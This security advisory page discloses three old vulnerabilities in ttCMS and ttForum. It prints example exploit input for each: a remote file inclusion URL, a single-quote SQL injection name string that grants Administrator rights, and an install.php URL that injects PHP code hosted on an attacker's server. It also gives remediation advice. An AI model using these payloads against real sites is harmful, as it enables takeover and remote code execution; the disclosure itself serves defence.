ttcms and ttforum exploits

2007.10.23
Credit: Charles Reinold
Risk: High
Local: No
Remote: Yes
CVE: CVE-2003-1458 | CVE-2003-1459
CWE: N/A

hope this is the right place to send this exploit info, I found three diffrent exploits for a forum software / cms software: ------------------------------------------------------------------------ -- ---------------------------------------------------------------------- Affected Product: ttCMS or ttForum Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum. Description of exploit: Open up modules/forum/News.php (ttCMS) or News.php (ttForum). As you can see, this line: include($template . '.' . $ext); Includes a file directly from the user input. Here's an example exploit URL: http://www.yourserver.com/ttforum/index.php? action=news;board=1;template=http://www.yourserver.com/modules/forum/hel pa dmin;ext=help As you can see, it's possible to execute remote code using this hole. Possible solutions: Install YaBB SE 1.5.2. While ttForum is a derivative of YaBB SE, this hole does not exist there. Upgrade to a newer version of ttForum/ttCMS that fixes the hole. (none is yet available.) Use a different forum and/or CMS software. ------------------------------------------------------------------------ -- ---------------------------------------------------------------------- Affected Product: ttCMS or ttForum Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum. Description of exploit: Open up modules/forum/src/Profile.php (ttCMS) or src/Profile.php (ttForum). As you can see, this line: foreach ($HTTP_POST_VARS as $key => $value) { $member[$key] = str_replace(array('&', '"', '<', '>'), array ('&', '"', '<', '>'), trim($value)); Parses out ", <, >, and &. It, however, does not parse out a SINGLE quote. Now scroll down. SET $queryPasswdPart $customTitlePart realName='$member[name]', As you can see, simply setting your name to "me' memberGroup='Administrator" would make you an Administrator on any server that had magic_quotes_gpc off. As you can see from the php.ini-recommended file: ; - magic_quotes_gpc = Off [Performance] They recommend it off, and thus a multitude of servers have it off, enabling this hole. Possible solutions: Install YaBB SE 1.5.2. While ttForum is a derivative of YaBB SE, this hole does not exist there. Upgrade to a newer version of ttForum/ttCMS that fixes the hole. (none is yet available.) Use a different forum and/or CMS software. ------------------------------------------------------------------------ -- ---------------------------------------------------------------------- Title: ttForum / ttCMS, remote command execution. Application: ttForum up to 1.1, ttCMS 2.2Platform(s): Unix Technical description: ---------------------- Everybody can inject PHP code in ttForum/ttCMS through the ttForumInstaller. The Installer (which can be found in the /modules/forumdirectory in ttCMS) includes the Forum-Settings throughinclude("$installdir/Settings.php") where $installdir istaken from a Form.In order to exploit this vulnerability, all you have to do is tocreate a File "Settings.php" on your own webserver which containsthe code you want to execute on the target-system. If you now callthe install.php-File with the following parameters:http://target- system/install.php?step=7&installdir=http://yourserver/the code in Settings.php will be injected. Recommendations: ---------------- Delete install.php AS SOON AS POSSIBLE or use YaBB SE 1.5.2 (ttForumis a derivate of YaBB SE)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top